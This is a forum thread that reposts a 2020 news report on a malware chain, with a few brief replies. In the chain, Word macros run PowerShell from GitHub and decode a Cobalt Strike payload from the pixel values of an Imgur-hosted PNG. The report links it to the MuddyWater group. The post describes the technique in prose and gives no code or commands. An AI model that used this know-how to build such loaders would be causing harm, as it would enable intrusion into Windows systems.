Diamond New malware downloads Cobalt Strike via PNG image from Imgur

fsociety · 12-29-2020, 08:37 AM

Code:
A security researcher using the Arkbird alias talked about a new malware that uses Word files with macros to download PowerShell scripts from GitHub. The script additionally downloads a legitimate file from the Imgur image hosting service to decode the Cobalt Strike payload on Windows systems.

As explained by Arkbird, the malware chain comes as an embedded macro in an outdated Microsoft Word file (* .doc). When you open a Word document, an inline macro is run that runs powershell.exe and passes it the location of the PowerShell script hosted on GitHub. The one-line script has instructions on how to download a real PNG file from the Imgur image hosting service.

While the image itself may be harmless, the pixel values ​​are used by the script when calculating the next stage payload. The payload calculation algorithm runs a foreach loop to iterate over the pixel values ​​in the PNG image and performs certain arithmetic operations to obtain ASCII functional commands.

The decoded script executes the Cobalt Strike payload. According to Arkbird, the payload does communicate with the C&C server through the WinINet module for further instructions.

Some experts have linked this type of malware to the MuddyWater APT group (also known as SeedWorm and TEMP.Zagros), first discovered in 2017 and mainly targeting Middle Eastern organizations.

Source: https://www.securitylab.ru/news/515126.php

mothered · 12-29-2020, 09:00 AM

Seems like a lot of major Industries/services have been under attack recently.

You've got to love the vulnerability of the good ol' Microsoft Word document- It's been around for decades.

Saidben118 · 06-11-2024, 01:45 PM

Thanks hro it’s very very good

singonator · 07-01-2024, 10:37 PM

(12-29-2020, 08:37 AM)fsociety Wrote:
Code:
A security researcher using the Arkbird alias talked about a new malware that uses Word files with macros to download PowerShell scripts from GitHub. The script additionally downloads a legitimate file from the Imgur image hosting service to decode the Cobalt Strike payload on Windows systems. As explained by Arkbird, the malware chain comes as an embedded macro in an outdated Microsoft Word file (* .doc). When you open a Word document, an inline macro is run that runs powershell.exe and passes it the location of the PowerShell script hosted on GitHub. The one-line script has instructions on how to download a real PNG file from the Imgur image hosting service. While the image itself may be harmless, the pixel values are used by the script when calculating the next stage payload. The payload calculation algorithm runs a foreach loop to iterate over the pixel values in the PNG image and performs certain arithmetic operations to obtain ASCII functional commands. The decoded script executes the Cobalt Strike payload. According to Arkbird, the payload does communicate with the C&C server through the WinINet module for further instructions. Some experts have linked this type of malware to the MuddyWater APT group (also known as SeedWorm and TEMP.Zagros), first discovered in 2017 and mainly targeting Middle Eastern organizations. Source: https://www.securitylab.ru/news/515126.php

This becoming interesting